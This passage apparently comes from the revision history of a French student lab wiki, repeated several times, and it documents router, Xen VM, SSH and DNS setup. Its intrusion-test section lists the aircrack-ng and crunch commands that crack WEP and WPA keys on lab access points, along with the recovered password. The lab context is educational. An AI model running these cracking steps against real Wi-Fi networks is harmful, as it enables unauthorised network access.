mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:DA:D2:9C:50:53 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid 44:DA:D2:9C:50:53 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56976TP sysres IMA5 2021/2022 G72021-12-13T15:06:04Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:DA:D2:9C:50:53 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid 44:DA:D2:9C:50:53 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56975TP sysres IMA5 2021/2022 G72021-12-13T15:05:00Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:AD:D9:5F:87:04 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid 44:AD:D9:5F:87:04 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56974TP sysres IMA5 2021/2022 G72021-12-13T15:04:50Z<p>Avercaem : /* WPA */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
